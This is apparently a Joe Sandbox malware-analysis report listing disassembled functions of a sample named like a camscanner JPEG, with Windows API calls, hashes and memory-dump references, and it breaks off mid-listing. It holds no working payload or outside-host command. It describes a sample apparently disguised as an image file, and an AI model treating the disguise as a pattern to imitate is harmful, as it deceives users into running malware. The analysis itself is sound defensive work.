Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: 70cc27efd54403eebbad8668dea62bf760f27cf61ac3a9ca1c3910245f29406b
Instruction ID: ccd8e90e53bd547ce555faf0a88c0b4db7f619f01c1663a473e2e99c851a8e73
Opcode Fuzzy Hash: 70cc27efd54403eebbad8668dea62bf760f27cf61ac3a9ca1c3910245f29406b
Instruction Fuzzy Hash: D841A571A04516BECF107BB5CC45DAF76A8EF45369B20823BF521F20E1C77C8A418A6D

Function 00401D9B Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D9E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
ReleaseDC.USER32(?,00000000), ref: 00401DD1
CreateFontIndirectA.GDI32(0040A7E8), ref: 00401E20

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 55f869a5fda598a51216703b66032495b4875bc01aae277dd35d106919e713e4
Instruction ID: 85430ec79d7d493a62f5c90f0650e63f0d0faf8675fc45e27afe54df9b067c18
Opcode Fuzzy Hash: 55f869a5fda598a51216703b66032495b4875bc01aae277dd35d106919e713e4
Instruction Fuzzy Hash: CD019271948341AFE7009BB0AE49E9A7FB4DB55305F108479F101BB2E2CA7841909F2F

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D45
GetClientRect.USER32(00000000,?), ref: 00401D52
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
DeleteObject.GDI32(00000000), ref: 00401D90

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: ca1012e2c79ca43f41ba06613fdc3e207cf0b560d2e9a5361b5766506e6a226b
Instruction ID: 236c2df16a83e1707d8be159829b3a1190eecd98233effbe731bed35476ffb6f
Opcode Fuzzy Hash: ca1012e2c79ca43f41ba06613fdc3e207cf0b560d2e9a5361b5766506e6a226b
Instruction Fuzzy Hash: 01F0ECB2A04115BFDB01ABA4DE89DEFBBBCEB44305B044466F601F2191C6749D018B79

Function 00404852 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0041FD08,0041FD08,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040476D,000000DF,00000000,00000400,?), ref: 004048F0
wsprintfA.USER32 ref: 004048F8
SetDlgItemTextA.USER32(?,0041FD08), ref: 0040490B

Strings

%u.%u%s%s, xrefs: 004048DA

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
Opcode ID: 1cf69ea9c1935000c011369af6ecdd87187f962970d1aa2f375690928522d96a
Instruction ID: 0ac14a548df83272d562d6c5522d93b353c1d491cf82d9c84c752126d1ac48ba
Opcode Fuzzy Hash: 1cf69ea9c1935000c011369af6ecdd87187f962970d1aa2f375690928522d96a
Instruction Fuzzy Hash: 2A11D573A041243BDB0065A99C45EAF3288DB85374F254637FE25F71D2EA78CC1285A8

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
Instruction ID: 3953527ca16890ec8ab59ce35194567eea46ff7bd29c8182c04533b3460f2dbd
Opcode Fuzzy Hash: 5c5cc43d9ea2f1c4f8babb9c5b306aab98c19b0d16ecc4efa158615eb64d646c
Instruction Fuzzy Hash: 0C21A2B1E44209BEEF15DFA5D986AAD7BB4EF84304F24843EF501B61D0CB7886418F28

Function 00402003 Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 0040202E

Part of subcall function 00405091: lstrlenA.KERNEL32(0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000,?), ref: 004050CA
Part of subcall function 00405091: lstrlenA.KERNEL32(004030CC,0041F4E8,00000000,?,00000000,?,?,?,?,?,?,?,?,?,004030CC,00000000), ref: 004050DA
Part of subcall function 00405091: lstrcatA.KERNEL32(0041F4E8,004030CC,004030CC,0041F4E8,00000000,?,00000000), ref: 004050ED
Part of subcall function 00405091: SetWindowTextA.USER32(0041F4E8,0041F4E8), ref: 004050FF
Part of subcall function 00405091: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405125
Part of subcall function 00405091: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040513F
Part of subcall function 00405091: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040514D

LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040203E
GetProcAddress.KERNEL32(00000000,?), ref: 0040204E
FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 004020B8

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
String ID:
API String ID: 2987980305-0
Opcode ID: 56ae3f35ee98f0e8af679ca636a053002c9d71c4b06210d01490db08ae71d63a
Instruction ID: fd60b9c6cfc4bddbe94fc7e5a8503348695d94644a3847b69ed94d97695b539d
Opcode Fuzzy Hash: 56ae3f35ee98f0e8af679ca636a053002c9d71c4b06210d01490db08ae71d63a
Instruction Fuzzy Hash: BC21C971A00215BBCF207FA48E49BAE75B0AB54359F20413BF601B22D0C6BD4A42D66E

Function 00402BCD Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C32
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C3B
RegCloseKey.ADVAPI32(?,?,?), ref: 00402C5C

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 3334b5ba8839b6b08f8d1b22820b7a27cd9b98a0074514e5335d38f885d40b59
Instruction ID: 3f870e478545c218cbf8d1d8c83e1046b3ec80cd8b5b23ff6fd5b08b87a912e1
Opcode Fuzzy Hash: 3334b5ba8839b6b08f8d1b22820b7a27cd9b98a0074514e5335d38f885d40b59
Instruction Fuzzy Hash: 76112B36504109FBEF129F91CE09F9E7B69AB48340F104072BE05B51E0E7B5AE11ABA9

Function 00402CFF Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00402EDF,00000001), ref: 00402D12
GetTickCount.KERNEL32 ref: 00402D30
CreateDialogParamA.USER32(0000006F,00000000,00402C7C,00000000), ref: 00402D4D
ShowWindow.USER32(00000000,00000005), ref: 00402D5B

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
Instruction ID: f5aaf9fad63db9690dbd9b3812727a8d708a0014de572c02bbf4379bbf317f26
Opcode Fuzzy Hash: 10c80b0613a78b839ad02c7969bec3604bf4f1206715e27e9f15991f3fdd17a2
Instruction Fuzzy Hash: 42F05E70906220ABCA217F64FE4CACB7BA4FB45B527014576F145B11E4C3799C8ACBDD

Function 00405005 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00405034
CallWindowProcA.USER32(?,?,?,?), ref: 00405085

Part of subcall function 00404055: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00404067

Strings

, xrefs: 00405015

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
Instruction ID: 5be162d7cd7d71c2ccb341d7130f59d8c0266776e22eb2788f3d6f03133d665e
Opcode Fuzzy Hash: 3aee37f21ff99dc198a5fd33356f68d884607a106991554e7d1ecd4dd831c2ab
Instruction Fuzzy Hash: 2D019A7150060DABDF209F20DC80EAF3A25EB80354F204036FA14792D0C73A8891AEAA

Function 00405B32 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405B46
GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B60

Strings

nsa, xrefs: 00405B3D

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction ID: 47ad9e4c3b070603f63866c15a94f77f10573a77d4085d28ed577f0a2abf86d9
Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
Instruction Fuzzy Hash: FFF089367082086BD7104F55DC04B9B7BA8DF91750F10803BFA049A191D6B4B9548B59

Function 00405609 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 00405632
CloseHandle.KERNEL32(?), ref: 0040563F

Strings

Error launching installer, xrefs: 0040561C

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction ID: 9728a5d5e843408a2f651da6c1778568bac2657747ba6051cf584ee7dfff0d45
Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction Fuzzy Hash: B0E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79

Function 00406A2B Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
Instruction ID: ffc4466fd7e1a84d1c0fc4b16d1a76bfc4ed23806840a2aa82a83de6544419ef
Opcode Fuzzy Hash: b2818476e1d6469588ef8d75e2f77556e52d803f704a1a77dfe7aba4081c4173
Instruction Fuzzy Hash: D6A15371E00229DBDF28CFA8C8547ADBBB1FF44305F15802AD856BB281C7789A96DF44

Function 00406C2C Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
Instruction ID: 3b3aa2dd6ba4133719dd3176c6350ec32f9f513342808bce88e7bfcf8f6a0710
Opcode Fuzzy Hash: 56f2a3a3000d6c7273ab2248f4ff10f601781423d0ca2bb331c25efff9829afe
Instruction Fuzzy Hash: F4913370E00229DBDF28CF98C8587ADBBB1FF44305F15802AD852BB291C7789A96DF44

Function 00406942 Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
Instruction ID: 583e61d198cc77022754fa770bf55cdcc509db116518bb017f27c6a68360c261
Opcode Fuzzy Hash: 7fc8b0fe229dbff43726b3aa98382c4509895189392f9f8db1d3ee082f796570
Instruction Fuzzy Hash: B9814471D04229DBDF24CFA8C884BADBBB1FF44305F25816AD446BB281C7389A96DF54

Function 00406447 Relevance: 5.2, APIs: 4, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
Instruction ID: 20cbf149701654aecfc40dff313aa48f1da8dd35a22a44c357500b5e58bb095b
Opcode Fuzzy Hash: 27bf3f2d71280db305e6514bcdeee96470c11e7b3e186f58d433be2447d111a6
Instruction Fuzzy Hash: 1B816571D04229DBDF28CFA8C844BADBBB0FF44305F21816AD856BB281C7785A96DF54

Function 00406895 Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158124813.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000440000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158159870.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_jpgcamscanner_20240521_0072345_JPEG.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
Instruction ID: 803a34037b0f7f5be0b8e0f61a876c36f0b5510bb0b2ab0f73e67388892f039f
Opcode Fuzzy Hash: f7de7d62d5bd7f5964df27a39736f706d5b0cb98cf3e46e90e0dfc1ab4ed8f1c
Instruction Fuzzy Hash: 95710471D04229DBDF24CFA8C8447ADBBB1FB44305F15806AD846BB281D7385A96DF54

Function 004069B3 Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.24158053281.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.24158021046.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.24158089534.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
